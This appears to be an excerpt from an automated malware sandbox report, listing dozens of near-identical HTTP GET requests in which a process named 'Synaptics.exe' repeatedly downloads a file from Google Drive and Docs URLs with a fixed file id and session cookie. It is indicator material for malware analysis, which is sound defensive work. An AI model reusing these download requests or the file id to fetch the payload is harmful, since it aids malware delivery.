                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
